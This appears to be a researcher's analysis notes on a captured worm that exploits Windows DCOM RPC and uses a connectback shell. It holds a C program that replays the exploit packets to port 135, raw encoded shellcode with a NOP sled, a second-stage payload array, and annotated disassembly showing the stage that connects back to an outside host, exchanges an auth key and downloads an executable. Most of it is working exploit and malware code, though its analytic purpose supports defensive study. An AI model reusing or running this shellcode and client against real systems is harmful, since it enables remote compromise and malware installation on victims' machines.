this buddy exploits dcom, and uses connectback.
the ip & port to connectback are known, and we got decryption for them.
the problem is:
on after connecting we recv() 380 bytes, and have to send a 4 byte reply.
if this reply is correct, we get the binary.
the code to open the connectback shell.
#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #include <fcntl.h> #include <unistd.h> #include <sys/select.h> #include <ctype.h> #define HOSTNAME "123.23.23.23" #define PORT 135 unsigned char unknown_req1[] = { 0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00 ,0xb8,0x4a,0x9f,0x4d,0x1c,0x7d,0xcf,0x11,0x86,0x1e,0x00,0x20,0xaf,0x6e,0x7c,0x57 ,0x00,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00 ,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00 }; unsigned char unknown_req2[] = {0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x8a,0x06,0x00,0x00,0x00,0x00,0x00,0x00 ,0x72,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x58,0x7d,0x75,0x75,0x40,0xeb,0xc6,0x47,0xbc,0x71,0x4e,0xa7 ,0x1c,0xd0,0xb5,0x97,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x09,0x00,0x00,0x03,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x5c,0x00,0x5c,0x00,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,0x10,0xeb,0x19 ,0x9f,0x75,0x18,0x00,0x23,0x37,0xf3,0x77,0xeb,0xe0,0xfd,0x7f,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0xeb,0x04,0xff,0xff,0xff,0xff,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0xeb,0x04,0xeb,0x04,0x90,0x90,0x90,0x90,0xeb,0x04,0xff,0xff,0xff,0xff ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,0x15,0xb9,0x8b,0xe6,0x13,0x41,0x81 ,0xf1,0x39,0xe6,0x13,0x41,0x5e,0x80,0x74,0x31,0xff,0x17,0xe2,0xf9,0xeb,0x05,0xe8 ,0xe6,0xff,0xff,0xff,0x24,0xcc,0x73,0x9c,0x54,0x27,0x9c,0x57,0x1b,0x9c,0x67,0x0b ,0xba,0x9c,0x6f,0x1f,0xff,0x52,0x17,0x17,0x17,0x44,0x41,0x9c,0x48,0x2b,0x9c,0x4b ,0x2c,0x6f,0x14,0xc8,0x44,0x9c,0x4c,0x37,0x14,0xc8,0x44,0x94,0xd4,0x13,0x9c,0x24 ,0x14,0xe0,0x24,0xde,0xbb,0x25,0xdf,0xd6,0xd6,0x12,0x93,0xd7,0x62,0xe1,0x3c,0xdd ,0x62,0xfe,0x4f,0x3c,0xcf,0xc6,0xfc,0x49,0x14,0x49,0x33,0x14,0xc8,0x71,0x9c,0x1c ,0x9c,0x49,0x0b,0x14,0xc8,0x9c,0x13,0x9c,0x14,0xd0,0x49,0x4c,0xe8,0xf7,0x49,0x7f ,0x24,0x25,0x17,0x17,0x7f,0x60,0x64,0x25,0x48,0x43,0xad,0x85,0x79,0x13,0x93,0xe8 ,0xc1,0x9c,0xef,0x96,0xfb,0x17,0x15,0x17,0x17,0x9c,0xfb,0x44,0x7d,0x16,0x7d,0x15 ,0xad,0x94,0x44,0x94,0x17,0xe8,0xc1,0x44,0x44,0x7f,0x29,0x38,0xce,0xe9,0x7f,0x15 ,0x17,0x2b,0x0e,0x9c,0xc3,0x9c,0xcf,0x7d,0x07,0x45,0x44,0xad,0x74,0x27,0x77,0x4d ,0xe8,0xc1,0x47,0xa3,0x15,0x47,0x42,0x44,0xad,0x17,0x4f,0x77,0xf5,0xe8,0xc1,0xa8 ,0xbb,0xbb,0x11,0x92,0xe8,0xf2,0x6c,0x79,0x73,0x65,0x7a,0x6c,0x64,0x6c,0x6a,0x64 ,0x71,0x66,0x70,0x6c,0x62,0x65,0x7a,0x71,0x79,0x71,0x76,0x76,0x79,0x6a,0x71,0x77 ,0x65,0x63,0x7a,0x75,0x6f,0x64,0x62,0x67,0x69,0x69,0x68,0x78,0x65,0x71,0x7a,0x6b ,0x75,0x6f,0x75,0x67,0x76,0x72,0x66,0x67,0x6b,0x75,0x6f,0x6d,0x6c,0x79,0x79,0x67 ,0x77,0x78,0x6f,0x6d,0x61,0x6c,0x72,0x6c,0x73,0x70,0x6a,0x63,0x64,0x73,0x6c,0x6c ,0x73,0x69,0x67,0x67,0x6b,0x66,0x73,0x71,0x6c,0x62,0x6a,0x6c,0x71,0x63,0x76,0x73 ,0x6e,0x78,0x6f,0x71,0x72,0x78,0x6f,0x76,0x63,0x73,0x75,0x70,0x70,0x6e,0x62,0x61 ,0x76,0x72,0x70,0x66,0x63,0x61,0x6a,0x66,0x67,0x76,0x68,0x76,0x71,0x7a,0x63,0x62 ,0x7a,0x63,0x66,0x65,0x78,0x6f,0x6e,0x68,0x68,0x61,0x70,0x66,0x6a,0x78,0x67,0x72 ,0x6d,0x68,0x70,0x6d,0x75,0x6c,0x75,0x62,0x6d,0x71,0x7a,0x72,0x6d,0x76,0x63,0x76 ,0x73,0x70,0x6a,0x79,0x68,0x61,0x62,0x63,0x76,0x76,0x71,0x68,0x78,0x63,0x6b,0x6f ,0x7a,0x6a,0x78,0x68,0x70,0x6f,0x76,0x63,0x66,0x74,0x61,0x74,0x71,0x61,0x66,0x62 ,0x74,0x68,0x67,0x75,0x61,0x74,0x72,0x75,0x6a,0x68,0x75,0x63,0x69,0x72,0x62,0x6b ,0x6a,0x67,0x64,0x70,0x6c,0x78,0x67,0x61,0x71,0x66,0x7a,0x67,0x67,0x71,0x63,0x6a ,0x62,0x69,0x79,0x6a,0x71,0x76,0x77,0x66,0x67,0x7a,0x74,0x69,0x72,0x77,0x6f,0x63 ,0x79,0x7a,0x8b,0x45,0x30,0x05,0x24,0xfb,0xff,0xff,0xff,0xe0,0xeb,0xf4,0x70,0x75 ,0x0b,0x0b,0x1b,0x00,0x6b,0x6a,0x69,0x68,0x74,0x70,0x6f,0x66,0x68,0x6c,0x65,0x65 ,0x77,0x72,0x61,0x79,0x78,0x6b,0x61,0x76,0x78,0x77,0x64,0x71,0x61,0x71,0x7a,0x76 ,0x77,0x67,0x62,0x77,0x65,0x67,0x6f,0x66,0x74,0x74,0x73,0x6d,0x77,0x6f,0x75,0x6e ,0x62,0x6d,0x6f,0x64,0x73,0x6d,0x78,0x6c,0xeb,0x06,0x6d,0x64,0x59,0x1c,0x00,0x01 ,0x8b,0x44,0x24,0xfc,0x05,0xe0,0xfa,0xff,0xff,0xff,0xe0,0x6d,0x75,0x6a,0x64,0x6b ,0x75,0x63,0x69,0x77,0x65,0x63,0x74,0x61,0x75,0x64,0x70,0x73,0x66,0x68,0x67,0x69 ,0x62,0x67,0x63,0x75,0x72,0x66,0x6a,0x6a,0x6e,0x6e,0x78,0x72,0x78,0x66,0x5c,0x00 ,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x68,0x1c,0x09,0x00,0x01,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x07,0x00}; typedef unsigned int uint; typedef unsigned char byte; void hexdump(byte *data, uint len) { char conv[] = "0123456789abcdef"; printf("=------------------[ hexdump(0x%08x , 0x%08x) ]-------------------=\n", (unsigned int)data, len); for( unsigned int i = 0; i < len; i += 0x10 ) { printf("0x%04x ", i); for( unsigned int j = 0; j < 0x10; j++ ) { if( i + j < len ) { printf("%c%c ",conv[((data[i + j] & 0xFF) >> 4)],conv[((data[i + j] & 0xff) & 0x0F)]); } else printf(" "); if( j == 7 ) printf(" "); } printf(" "); for( unsigned int j = 0; j < 0x10; j++ ) { if( i + j < len ) printf("%c", isprint(data[i + j]) ? data[i + j] : '.'); else printf(" "); if( j == 7 ) printf(" "); } printf("\n"); } printf("=-------------------------------------------------------------------------=\n"); } char *getreply(int sockfd,int timeout) { printf("[*] Trying to receive a reply \n"); char rb[1500]; fd_set fdreadme; int i; struct timeval tv; tv.tv_sec = 10; tv.tv_usec = 0; FD_ZERO(&fdreadme); FD_SET(sockfd, &fdreadme); FD_SET(sockfd, &fdreadme); FD_SET(0, &fdreadme); if(select(FD_SETSIZE, &fdreadme, NULL, NULL, &tv) < 0 ) { return NULL; } if(FD_ISSET(sockfd, &fdreadme)) { if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0) { printf("[-] Connection lost..\n"); exit(1); }else { printf("\t[+] got %i bytes of data \n",i); hexdump((byte *)rb,i); } } return NULL; } int senddata(int sockfd,unsigned char *data,int len) { int sended=0; if ( (sended = send(sockfd,data,len,0)) != len ) { printf("\t[-] Could not send complete data (%i < %i)\n",sended,len); } else { printf("\t[+] Sended Request \n"); } return sended; } int main() { struct hostent *he; struct sockaddr_in their_addr; int sockfd=-1; printf("[*]Resolving Hostname %s \n",HOSTNAME); if((he = gethostbyname(HOSTNAME)) == NULL) { printf("\t[-] gethostbyname: Couldnt resolve hostname\n"); exit(1); } printf("\t[+] Done. (%s) \n", inet_ntoa(*((struct in_addr *)he->h_addr))); printf("[*] Connecting Server \n"); their_addr.sin_family = AF_INET; their_addr.sin_addr = *((struct in_addr *)he->h_addr); their_addr.sin_port = htons(PORT); if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("\t[-] Socket failed"); return(0); } else { printf("\t[+] created Socket \n"); } if ( connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1 ) { perror("\t[-] Connect failed"); return(0); } else { printf("\t[+] Connected ...\n"); } printf("[*] Sending Request #1 (%i bytes)\n",sizeof(unknown_req1)); senddata(sockfd,unknown_req1,sizeof(unknown_req1)); getreply(sockfd,0); printf("[*] Sending Request #2 (%i bytes)\n",sizeof(unknown_req2)); senddata(sockfd,unknown_req2,sizeof(unknown_req2)); getreply(sockfd,0); printf("[*] Closing Socket \n"); printf("\t[+] done (%i)\n",close(sockfd)); return 0; }
the 380 byte replies we get afer connecting the host.
unsigned char unknown_req3[] = { 0x83 ,0xec ,0x20 ,0x8b ,0xec ,0x89 ,0x5d ,0x04 ,0x89 ,0x7d ,0x00 ,0x81 ,0xec ,0x00 ,0x02 ,0x00 ,0x00 ,0x89 ,0x65 ,0x14 ,0x33 ,0xdb ,0x64 ,0x8b ,0x43 ,0x30 ,0x8b ,0x40 ,0x0c ,0x8b ,0x70 ,0x1c ,0xad ,0x8b ,0x78 ,0x08 ,0x89 ,0x7d ,0x08 ,0xe8 ,0x45 ,0x00 ,0x00 ,0x00 ,0x53 ,0x56 ,0x8b ,0x5f ,0x3c ,0x8b ,0x5c ,0x3b ,0x78 ,0x03 ,0xdf ,0x53 ,0x8b ,0x5b ,0x20 ,0x03 ,0xdf ,0x53 ,0x83 ,0xc3 ,0x04 ,0x8b ,0x33 ,0x03 ,0xf7 ,0x33 ,0xc9 ,0xac ,0x32 ,0xc8 ,0xc1 ,0xc1 ,0x05 ,0x84 ,0xc0 ,0x75 ,0xf6 ,0x2b ,0xca ,0x75 ,0xe9 ,0x58 ,0x2b ,0xd8 ,0xd1 ,0xeb ,0x5e ,0x03 ,0x5e ,0x24 ,0x03 ,0xdf ,0x66 ,0x8b ,0x0b ,0x8b ,0x5e ,0x1c ,0x03 ,0xdf ,0x8b ,0x04 ,0x8b ,0x03 ,0xc7 ,0x5e ,0x5b ,0xff ,0xe0 ,0x5e ,0x68 ,0x33 ,0x32 ,0x00 ,0x00 ,0x68 ,0x77 ,0x73 ,0x32 ,0x5f ,0x54 ,0xba ,0x92 ,0x6e ,0x04 ,0x84 ,0xff ,0xd6 ,0x89 ,0x45 ,0x0c ,0x8b ,0xf8 ,0x53 ,0x6a ,0x04 ,0x55 ,0xff ,0x75 ,0x04 ,0xba ,0x00 ,0x90 ,0x66 ,0xe0 ,0xff ,0xd6 ,0x83 ,0xf8 ,0x04 ,0x0f ,0x85 ,0xc5 ,0x00 ,0x00 ,0x00 ,0x8b ,0x7d ,0x08 ,0xe8 ,0x0d ,0x00 ,0x00 ,0x00 ,0x69 ,0x6c ,0x6b ,0x68 ,0x63 ,0x76 ,0x64 ,0x2e ,0x65 ,0x78 ,0x65 ,0x00 ,0x00 ,0x8f ,0x45 ,0x18 ,0x53 ,0x6a ,0x02 ,0x6a ,0x01 ,0x53 ,0x53 ,0x68 ,0x00 ,0x00 ,0x00 ,0xc0 ,0xff ,0x75 ,0x18 ,0xba ,0x3d ,0xd3 ,0x6b ,0x5c ,0xff ,0xd6 ,0x89 ,0x45 ,0x1c ,0x40 ,0x0f ,0x84 ,0x8d ,0x00 ,0x00 ,0x00 ,0x8b ,0x7d ,0x0c ,0x33 ,0xc0 ,0x50 ,0xb4 ,0x02 ,0x50 ,0xff ,0x75 ,0x14 ,0xff ,0x75 ,0x04 ,0xba ,0x00 ,0x58 ,0x60 ,0xe2 ,0xff ,0xd6 ,0x8b ,0x7d ,0x08 ,0x85 ,0xc0 ,0x74 ,0x1e ,0x8b ,0xc8 ,0x41 ,0x74 ,0x57 ,0x53 ,0x8d ,0x4d ,0x10 ,0x51 ,0x50 ,0xff ,0x75 ,0x14 ,0xff ,0x75 ,0x1c ,0xba ,0xb9 ,0xbe ,0xf5 ,0xcb ,0xff ,0xd6 ,0x85 ,0xc0 ,0x74 ,0x40 ,0xeb ,0xc5 ,0xff ,0x75 ,0x1c ,0xba ,0x5c ,0x93 ,0xc5 ,0x9d ,0xff ,0xd6 ,0x6a ,0x44 ,0x58 ,0x2b ,0xe0 ,0x8b ,0xfc ,0x8b ,0xd7 ,0xab ,0x33 ,0xc0 ,0x6a ,0x10 ,0x59 ,0xab ,0xe2 ,0xfd ,0x8b ,0x7d ,0x08 ,0x52 ,0x52 ,0x50 ,0x50 ,0x50 ,0x50 ,0x50 ,0x50 ,0x50 ,0xff ,0x75 ,0x18 ,0xba ,0x2c ,0xf1 ,0x94 ,0x26 ,0xff ,0xd6 ,0x58 ,0xfe ,0xc7 ,0x53 ,0x50 ,0xba ,0x01 ,0xd6 ,0x34 ,0xde ,0xff ,0xd6 ,0xff ,0x75 ,0x1c ,0xba ,0x5c ,0x93 ,0xc5 ,0x9d ,0xff ,0xd6 ,0xff ,0x75 ,0x18 ,0xba ,0x3d ,0x53 ,0xcf ,0x27 ,0xff ,0xd6 ,0x8b ,0x7d ,0x0c ,0xff ,0x75 ,0x04 ,0xba ,0x85 ,0x56 ,0x31 ,0x07 ,0xff ,0xd6 ,0x8b ,0x7d ,0x08 ,0xba ,0xba ,0x46 ,0x0c ,0xc1 ,0xff ,0xd6 };
In short: Stage 1 contains an authentication key (4 bytes) and opens a connectback connection. The attacker will then send stage 2 over this connection (380 bytes more code). Stage 2 replies the authentication key from stage 1, if this key is verified as valid, the attacker will stream the binary.
00402018 eb 15 jmp short link-03.0040202f 0040201a b9 8be61341 mov ecx,4113e68b 0040201f 81f1 39e61341 xor ecx,4113e639 00402025 5e pop esi 00402026 807431 ff 17 xor byte ptr ds:[ecx+esi-1],17 0040202b ^e2 f9 loopd short link-03.00402026 0040202d eb 05 jmp short link-03.00402034 0040202f e8 e6ffffff call link-03.0040201a 00402034 33db xor ebx,ebx 00402036 64:8b43 30 mov eax,dword ptr fs:[ebx+30] 0040203a 8b40 0c mov eax,dword ptr ds:[eax+c] 0040203d 8b70 1c mov esi,dword ptr ds:[eax+1c] 00402040 ad lods dword ptr ds:[esi] 00402041 8b78 08 mov edi,dword ptr ds:[eax+8] 00402044 e8 45000000 call link-03.0040208e 00402049 53 push ebx ; ------ syscall finder 0040204a 56 push esi 0040204b 8b5f 3c mov ebx,dword ptr ds:[edi+3c] 0040204e 8b5c3b 78 mov ebx,dword ptr ds:[ebx+edi+78] 00402052 03df add ebx,edi 00402054 53 push ebx 00402055 8b5b 20 mov ebx,dword ptr ds:[ebx+20] 00402058 03df add ebx,edi 0040205a 53 push ebx 0040205b 83c3 04 add ebx,4 0040205e 8b33 mov esi,dword ptr ds:[ebx] 00402060 03f7 add esi,edi 00402062 33c9 xor ecx,ecx 00402064 ac lods byte ptr ds:[esi] 00402065 32c8 xor cl,al 00402067 c1c1 05 rol ecx,5 0040206a 84c0 test al,al 0040206c ^75 f6 jnz short link-03.00402064 0040206e 2bca sub ecx,edx 00402070 ^75 e9 jnz short link-03.0040205b 00402072 58 pop eax 00402073 2bd8 sub ebx,eax 00402075 d1eb shr ebx,1 00402077 5e pop esi 00402078 035e 24 add ebx,dword ptr ds:[esi+24] 0040207b 03df add ebx,edi 0040207d 66:8b0b mov cx,word ptr ds:[ebx] 00402080 8b5e 1c mov ebx,dword ptr ds:[esi+1c] 00402083 03df add ebx,edi 00402085 8b048b mov eax,dword ptr ds:[ebx+ecx*4] 00402088 03c7 add eax,edi 0040208a 5e pop esi 0040208b 5b pop ebx 0040208c ffe0 jmp eax 0040208e 5e pop esi ; ------- end 0040208f 68 33320000 push 3233 00402094 68 7773325f push 5f327377 00402099 54 push esp 0040209a ba 926e0484 mov edx,84046e92 0040209f ffd6 call esi ; loadlibrarya() 004020a1 8bf8 mov edi,eax 004020a3 81ec 00020000 sub esp,200 004020a9 8bec mov ebp,esp 004020ab 53 push ebx 004020ac 6a 01 push 1 004020ae 6a 02 push 2 004020b0 ba 83538300 mov edx,835383 004020b5 ffd6 call esi ; socket() 004020b7 53 push ebx 004020b8 53 push ebx 004020b9 68 3e2fd9fe push fed92f3e 004020be 68 02003c19 push 193c0002 004020c3 8bd4 mov edx,esp 004020c5 8bd8 mov ebx,eax 004020c7 6a 10 push 10 004020c9 52 push edx 004020ca 53 push ebx 004020cb ba 6330605a mov edx,5a603063 004020d0 ffd6 call esi ; connect() 004020d2 50 push eax 004020d3 b4 02 mov ah,2 004020d5 50 push eax 004020d6 55 push ebp 004020d7 53 push ebx 004020d8 ba 005860e2 mov edx,e2605800 004020dd ffd6 call esi ; recv() 004020df bf acac0685 mov edi,8506acac ; ! this is the auth key 004020e4 ffe5 jmp ebp ; jump to stage 2
0040229a 83ec 20 sub esp,20 0040229d 8bec mov ebp,esp 0040229f 895d 04 mov dword ptr ss:[ebp+4],ebx 004022a2 897d 00 mov dword ptr ss:[ebp],edi ; save auth key in [ebp] 004022a5 81ec 00020000 sub esp,200 004022ab 8965 14 mov dword ptr ss:[ebp+14],esp 004022ae 33db xor ebx,ebx 004022b0 64:8b43 30 mov eax,dword ptr fs:[ebx+30] 004022b4 8b40 0c mov eax,dword ptr ds:[eax+c] 004022b7 8b70 1c mov esi,dword ptr ds:[eax+1c] 004022ba ad lods dword ptr ds:[esi] 004022bb 8b78 08 mov edi,dword ptr ds:[eax+8] 004022be 897d 08 mov dword ptr ss:[ebp+8],edi 004022c1 e8 45000000 call link-03.0040230b 004022c6 53 push ebx ; ----- syscall lookup fn 004022c7 56 push esi 004022c8 8b5f 3c mov ebx,dword ptr ds:[edi+3c] 004022cb 8b5c3b 78 mov ebx,dword ptr ds:[ebx+edi+78] 004022cf 03df add ebx,edi 004022d1 53 push ebx 004022d2 8b5b 20 mov ebx,dword ptr ds:[ebx+20] 004022d5 03df add ebx,edi 004022d7 53 push ebx 004022d8 83c3 04 add ebx,4 004022db 8b33 mov esi,dword ptr ds:[ebx] 004022dd 03f7 add esi,edi 004022df 33c9 xor ecx,ecx 004022e1 ac lods byte ptr ds:[esi] 004022e2 32c8 xor cl,al 004022e4 c1c1 05 rol ecx,5 004022e7 84c0 test al,al 004022e9 ^75 f6 jnz short link-03.004022e1 004022eb 2bca sub ecx,edx 004022ed ^75 e9 jnz short link-03.004022d8 004022ef 58 pop eax 004022f0 2bd8 sub ebx,eax 004022f2 d1eb shr ebx,1 004022f4 5e pop esi 004022f5 035e 24 add ebx,dword ptr ds:[esi+24] 004022f8 03df add ebx,edi 004022fa 66:8b0b mov cx,word ptr ds:[ebx] 004022fd 8b5e 1c mov ebx,dword ptr ds:[esi+1c] 00402300 03df add ebx,edi 00402302 8b048b mov eax,dword ptr ds:[ebx+ecx*4] 00402305 03c7 add eax,edi 00402307 5e pop esi 00402308 5b pop ebx 00402309 ffe0 jmp eax ; ------ 0040230b 5e pop esi 0040230c 68 33320000 push 3233 00402311 68 7773325f push 5f327377 00402316 54 push esp 00402317 ba 926e0484 mov edx,84046e92 0040231c ffd6 call esi ; loadlibrarya() 0040231e 8945 0c mov dword ptr ss:[ebp+c],eax 00402321 8bf8 mov edi,eax 00402323 53 push ebx ; int flags 00402324 6a 04 push 4 ; int len 00402326 55 push ebp ; const void *buf (auth key from stage 1) 00402327 ff75 04 push dword ptr ss:[ebp+4] ; int s 0040232a ba 009066e0 mov edx,e0669000 0040232f ffd6 call esi ; send() 00402331 83f8 04 cmp eax,4 00402334 0f85 c5000000 jnz link-03.004023ff 0040233a 8b7d 08 mov edi,dword ptr ss:[ebp+8] 0040233d e8 0d000000 call link-03.0040234f 00402342 6377 64 arpl word ptr ds:[edi+64],si 00402345 6f outs dx,dword ptr es:[edi] ; i/o command 00402346 7a 2e jpe short link-03.00402376 00402348 65:78 65 js short link-03.004023b0 ; superfluous prefix 0040234b 0000 add byte ptr ds:[eax],al 0040234d 0000 add byte ptr ds:[eax],al 0040234f 8f45 18 pop dword ptr ss:[ebp+18] ; ---- reply sent 00402352 53 push ebx 00402353 6a 02 push 2 00402355 6a 01 push 1 00402357 53 push ebx 00402358 53 push ebx 00402359 68 000000c0 push c0000000 0040235e ff75 18 push dword ptr ss:[ebp+18] 00402361 ba 3dd36b5c mov edx,5c6bd33d 00402366 ffd6 call esi ; createfilea 00402368 8945 1c mov dword ptr ss:[ebp+1c],eax 0040236b 40 inc eax 0040236c 0f84 8d000000 